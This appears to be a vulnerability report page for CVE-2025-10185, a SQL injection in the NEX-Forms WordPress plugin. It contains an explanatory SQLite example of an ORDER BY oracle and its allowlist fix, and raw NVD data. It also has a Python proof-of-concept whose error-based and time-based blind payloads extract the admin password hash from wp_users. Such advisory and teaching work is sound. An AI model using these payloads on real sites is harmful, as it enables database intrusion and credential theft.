Security Vulnerability Report
CVE-2025-10185 CVSS 4.9 MEDIUM

CVE-2025-10185

Published: 2025-10-11 08:15:32
Last Modified: 2026-04-15 00:35:42

Description

The NEX-Forms – Ultimate Forms Plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter of the nf_load_form_entries AJAX action in all versions up to and including 9.1.6. The user-supplied value is not sufficiently escaped and the existing SQL query is not prepared (CWE-89), so an authenticated attacker with Administrator-level access or higher can append additional SQL to the query and use it to extract sensitive information from the database. Lower-privileged users may be able to exploit the issue if a site administrator has granted them access to the affected functionality.
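The description above names the bug class but not why an ORDER BY injection is hard to fix with the usual tools. The following is an added example, not code from the NEX-Forms plugin or from the PoC on this page: it reproduces the pattern in miniature against an in-memory SQLite database with constructed tables (`entries`, `users`) and a constructed admin hash, shows a boolean ordering oracle that reads the hash out of an unrelated table one character at a time without any of it appearing in the response, shows that simply binding the orderby value as a query parameter is not a fix, and shows the allowlist check that is.

```python
"""Added example, not code from the NEX-Forms plugin or this page's PoC.

Reproduces the bug class behind CVE-2025-10185 in miniature with SQLite:
an attacker-controlled value concatenated into ORDER BY, an ordering
oracle that leaks a hash from an unrelated table, a parameter-binding
non-fix, and the allowlist check that closes the hole. All table names,
columns and data are constructed for the example.
"""
import sqlite3
import string

# Columns the entries list may legitimately be sorted by (constructed).
ALLOWED_ORDERBY = {"id", "created", "email"}
# Guess alphabet for the oracle. It contains no quote characters, so a
# guess can never break out of the SQL string literal it is placed in.
HASH_ALPHABET = string.ascii_letters + string.digits + "$./"


def make_db() -> sqlite3.Connection:
    """Constructed sample data: form entries plus a users table that the
    entries query has no business reading."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE entries (id INTEGER PRIMARY KEY, created TEXT, email TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        INSERT INTO entries VALUES (1, '2025-01-01', 'a@example.test');
        INSERT INTO entries VALUES (2, '2025-01-02', 'b@example.test');
        INSERT INTO entries VALUES (3, '2025-01-03', 'c@example.test');
        INSERT INTO users VALUES (1, 'admin', '$P$Bsecrethash');
        """
    )
    return conn


def load_entries_vulnerable(conn, orderby: str) -> list:
    """The bug class: the orderby string is dropped straight into the query."""
    sql = f"SELECT id FROM entries ORDER BY {orderby}"
    return [row[0] for row in conn.execute(sql)]


def load_entries_bound(conn, orderby: str) -> list:
    """A tempting non-fix. Binding ORDER BY as a parameter is legal SQL, but
    the value becomes a constant string: every row compares equal and the
    requested column is silently ignored."""
    sql = "SELECT id FROM entries ORDER BY ?"
    return [row[0] for row in conn.execute(sql, (orderby,))]


def load_entries_fixed(conn, orderby: str, direction: str = "ASC") -> list:
    """The fix: identifiers cannot be parameterized, so the column name is
    checked against an allowlist and the direction reduced to one of two
    literals before either is interpolated."""
    if orderby not in ALLOWED_ORDERBY:
        raise ValueError(f"unsupported orderby column: {orderby!r}")
    direction = "DESC" if direction.upper() == "DESC" else "ASC"
    sql = f"SELECT id FROM entries ORDER BY {orderby} {direction}"
    return [row[0] for row in conn.execute(sql)]


def oracle_payload(position: int, guess: str) -> str:
    """ORDER BY expression that leaks one bit: rows come back ascending by id
    if character `position` of the admin hash equals `guess`, descending
    otherwise. Only the row order changes; no users data is returned."""
    assert guess in HASH_ALPHABET
    return (
        "(CASE WHEN substr((SELECT user_pass FROM users WHERE id=1),"
        f"{position},1)='{guess}' THEN id ELSE -id END)"
    )


def extract_hash(conn, loader, length: int) -> str:
    """Recover up to `length` characters of the admin hash through `loader`.
    Stops early at the first position no guess flips, or as soon as the
    loader rejects the payload, so a non-leaking loader yields ''."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in HASH_ALPHABET:
            try:
                order = loader(conn, oracle_payload(pos, ch))
            except ValueError:
                return recovered
            if order == [1, 2, 3]:
                recovered += ch
                break
        else:
            break
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("leaked via vulnerable loader:", extract_hash(db, load_entries_vulnerable, 14))
    print("leaked via fixed loader:     ", repr(extract_hash(db, load_entries_fixed, 14)))
```

The same reasoning applies to the WordPress code this advisory is about: `$wpdb->prepare()` placeholders quote their values, so they cannot carry a column name or ASC/DESC keyword, and an allowlist comparison before interpolation is the only sound fix for an ORDER BY built from request data.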

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No CPE configuration data is available from NVD for this entry. The affected range stated by the advisory is:

NEX-Forms – Ultimate Forms Plugin for WordPress <= 9.1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

# CVE-2025-10185 SQL Injection PoC
# Target: NEX-Forms WordPress Plugin <= 9.1.6
# Vulnerable parameter: orderby in the nf_load_form_entries admin-ajax action
# Note: requires an authenticated Administrator session. Only the action name
# and the orderby parameter come from the advisory; the form_id and _wpnonce
# field names and the wp_ table prefix are assumptions to adjust per target.
import time

import requests

# WordPress site URL and authenticated session cookies
TARGET_URL = "https://target-wordpress-site.com"
COOKIES = {
    "wordpress_logged_in_[HASH]": "YOUR_AUTH_COOKIE_VALUE",
    "wordpress_sec_[HASH]": "YOUR_SEC_COOKIE_VALUE",
}
# WordPress AJAX nonce (required for authenticated AJAX requests)
NONCE = "YOUR_WORDPRESS_NONCE"


def send_orderby(target_url, cookies, nonce, payload):
    """POST one request to the vulnerable AJAX action with the given orderby value."""
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
    data = {
        "action": "nf_load_form_entries",
        "orderby": payload,
        "form_id": "1",      # assumed field name
        "_wpnonce": nonce,   # assumed field name
    }
    return requests.post(ajax_url, data=data, cookies=cookies, timeout=30)


def exploit_sqli(target_url, cookies, nonce):
    """
    Conditional-error injection via the 'orderby' parameter.

    The injection lands inside an ORDER BY clause, so UNION SELECT is not
    available (it is a syntax error after ORDER BY) and data must be inferred
    through an oracle instead. If the first character of the admin password
    hash is '$' (CHAR(36), the prefix of every WordPress hash) the expression
    evaluates to 1 and the query succeeds; otherwise the scalar subquery
    returns two rows and MySQL raises an error, which changes the response.
    """
    payload = (
        "(SELECT IF(SUBSTR((SELECT user_pass FROM wp_users WHERE ID=1),1,1)"
        "=CHAR(36),1,(SELECT 1 UNION SELECT 2))) ASC-- -"
    )
    response = send_orderby(target_url, cookies, nonce, payload)
    if response.status_code == 200:
        print(f"[+] Response received: {response.text[:500]}")
        # Compare with the response to a known-false condition to read the bit
        return response.text
    print(f"[-] Request failed with status: {response.status_code}")
    return None


def time_based_sqli(target_url, cookies, nonce, position=1, guess="$"):
    """
    Time-based blind variant for when database errors are suppressed.

    SLEEP(5) fires only if character `position` of the admin user's password
    hash equals `guess`; iterate over positions and a candidate alphabet
    (no quote characters) to recover the hash one character at a time.
    """
    payload = (
        "(SELECT IF(SUBSTRING((SELECT user_pass FROM wp_users "
        f"WHERE user_login='admin'),{position},1)='{guess}',SLEEP(5),0))-- -"
    )
    start_time = time.time()
    response = send_orderby(target_url, cookies, nonce, payload)
    elapsed = time.time() - start_time
    if elapsed >= 5:
        print(f"[+] Time-based injection confirmed (delay: {elapsed:.2f}s)")
        print(f"[+] Character {position} of the admin password hash is {guess!r}")
        return True
    print(f"[-] No delay detected (elapsed: {elapsed:.2f}s, HTTP {response.status_code})")
    return False


if __name__ == "__main__":
    print("[*] CVE-2025-10185 - NEX-Forms SQL Injection Exploit")
    print("[*] WARNING: Use only on systems you are authorized to test")
    exploit_sqli(TARGET_URL, COOKIES, NONCE)
    # time_based_sqli(TARGET_URL, COOKIES, NONCE)

References

Vulnerable code, tag 9.1.4 (class.db.php, line 2527): https://plugins.svn.wordpress.org/nex-forms-express-wp-form-builder/tags/9.1.4/includes/classes/class.db.php#2527
Plugin Trac changeset 3365585 (class.db.php): https://plugins.trac.wordpress.org/changeset/3365585/nex-forms-express-wp-form-builder/trunk/includes/classes/class.db.php
Wordfence advisory: https://www.wordfence.com/threat-intel/vulnerabilities/id/e68d47e7-9a42-4a77-aefa-fe130500cbd3?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-10185",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-11T08:15:31.790",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The NEX-Forms – Ultimate Forms Plugin for WordPress plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in the action nf_load_form_entries in all versions up to, and including, 9.1.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This may be exploitable by lower-level users if access is granted by a site administrator."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 4.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.svn.wordpress.org/nex-forms-express-wp-form-builder/tags/9.1.4/includes/classes/class.db.php#2527",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3365585/nex-forms-express-wp-form-builder/trunk/includes/classes/class.db.php",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e68d47e7-9a42-4a77-aefa-fe130500cbd3?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}